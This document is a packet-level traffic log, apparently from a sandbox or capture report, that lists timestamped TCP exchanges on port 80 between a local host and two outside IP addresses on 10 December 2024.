                                                  Dec 10, 2024 18:58:45.121560097 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.121654987 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.121695042 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.125878096 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.125933886 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.125936031 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.126074076 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.129991055 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.130017996 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.130049944 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.130383968 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.134239912 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.134365082 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.134876966 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.134919882 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.138530970 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.138612986 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.138641119 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.138679981 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.142786980 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.142865896 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.142899990 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.142999887 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.147130966 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.147218943 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.147232056 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.147336006 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.151448965 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.151519060 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.151561022 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.151679039 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.154649973 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.154694080 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.154743910 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.154803991 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.157905102 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.157953978 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.157999039 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.158057928 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.161237001 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.161283016 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.161314964 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.161423922 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.164374113 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.164446115 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.164532900 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.164721012 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.167562008 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.167648077 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.167680025 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.167993069 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.170789957 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.170878887 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.170898914 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.171019077 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.174087048 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.174134970 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.174165010 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.174204111 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.177310944 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.177429914 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.177467108 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.177510977 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.180588961 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.180660009 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.180670023 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.180697918 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.183757067 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.183868885 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.183895111 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.184012890 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.186917067 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.187134027 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.187205076 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.187366962 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.190171003 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.190243959 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.190270901 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.190546036 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.193432093 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.193499088 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.193517923 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.193634987 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.196876049 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.196983099 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.197046041 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.197093964 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.199917078 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.199982882 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.200067997 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.200156927 CET4972580192.168.2.8176.113.115.19
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 10, 2024 18:58:45.203118086 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.203171015 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.203214884 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.203274965 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.206324100 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.206384897 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.206427097 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.206515074 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.209537029 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.209602118 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.209639072 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.209697962 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.212851048 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.212914944 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.212965012 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.213028908 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.216026068 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.216128111 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.216156006 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.216166019 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.219258070 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.219326973 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.219429016 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.219477892 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.222425938 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.222573042 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.311599016 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.311733007 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.311901093 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.311975956 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.313185930 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.313241005 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.313271046 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.314034939 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.316190958 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.316231966 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.316262007 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.316320896 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.319284916 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.319370031 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.319406986 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.319516897 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.322247982 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.322386980 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.322459936 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.322459936 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.325287104 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.325373888 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.325381041 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.325412035 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.327991009 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.328078985 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.328152895 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.328227997 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.330701113 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.330780983 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.330811977 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.330909967 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.334106922 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.334156036 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.334460020 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.334683895 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.336385965 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.336394072 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.336440086 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.338610888 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.338665962 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.338730097 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.338785887 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.341201067 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.341347933 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.341347933 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.341451883 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.343692064 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.343784094 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.343811989 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.343893051 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.346272945 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.346349001 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.346379995 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.346426964 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.348757029 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.348841906 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.348881006 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.348920107 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.351248026 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.351320028 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.351409912 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.351459980 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.353770971 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.353815079 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.353976965 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.354039907 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.356297016 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.356415987 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.356425047 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.356458902 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.358797073 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.358858109 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.358932018 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.359031916 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.361478090 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.361490011 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.361578941 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.363894939 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.363960028 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.363970995 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.364017010 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.366327047 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.366379976 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.366415977 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.366461992 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.368860006 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.368916988 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.368980885 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.369046926 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.371402979 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.371471882 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.371486902 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.371551991 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.373797894 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.373869896 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.373883009 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.373929977 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.376260042 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.376329899 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.376354933 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.376411915 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.378771067 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.378813982 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.378839970 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.378875017 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.381479979 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.381490946 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.381597042 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.383706093 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.383814096 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.383830070 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.383913040 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.386149883 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.386276960 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.386296034 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.386399984 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.388659000 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.388725996 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.388755083 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.388802052 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.391154051 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.391287088 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.391338110 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.391376972 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.393595934 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.393699884 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.393712044 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.393742085 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.396169901 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.396177053 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.396256924 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.398559093 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.398628950 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.398644924 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.398732901 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.401073933 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.401138067 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.401223898 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.401272058 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.403506041 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.403569937 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.403624058 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.403676033 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.405998945 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.406039953 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.406121969 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.406174898 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.408524036 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.408617020 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.408667088 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.408716917 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.410938978 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.411005020 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.411160946 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.411211014 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.413386106 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.413467884 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.413495064 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.413595915 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.415898085 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.415954113 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.415999889 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.416140079 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.418339014 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.418412924 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.418432951 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.418494940 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.420835018 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.420955896 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.421057940 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.421092033 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.423384905 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.423453093 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.423455954 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.423526049 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.425787926 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.425847054 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.425888062 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.425939083 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.428510904 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.428560019 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.428913116 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.428977966 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.430805922 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.430847883 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.430875063 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.431346893 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.433249950 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.433325052 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.433342934 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.433495998 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.435785055 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.435817957 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.435887098 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.438198090 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.438271046 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.438343048 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.440732002 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.440824986 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.441353083 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.443099022 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.443201065 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.443376064 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.503792048 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.503909111 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.504846096 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.504980087 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.505232096 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.505284071 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:45.507010937 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:45.509309053 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 18:58:48.927938938 CET  49726        80         192.168.2.8     92.255.57.89
Dec 10, 2024 18:58:49.047302961 CET  80           49726      92.255.57.89    192.168.2.8
Dec 10, 2024 18:58:49.047420025 CET  49726        80         192.168.2.8     92.255.57.89
Dec 10, 2024 18:58:49.047620058 CET  49726        80         192.168.2.8     92.255.57.89
Dec 10, 2024 18:58:49.166851997 CET  80           49726      92.255.57.89    192.168.2.8
Dec 10, 2024 18:58:49.167007923 CET  80           49726      92.255.57.89    192.168.2.8
Dec 10, 2024 18:58:49.789520979 CET  80           49725      176.113.115.19  192.168.2.8
Dec 10, 2024 18:58:49.791280985 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 19:00:30.758436918 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 19:00:31.070981026 CET  49725        80         192.168.2.8     176.113.115.19
Dec 10, 2024 19:00:31.695966959 CET  49725        80         192.168.2.8     176.113.115.19
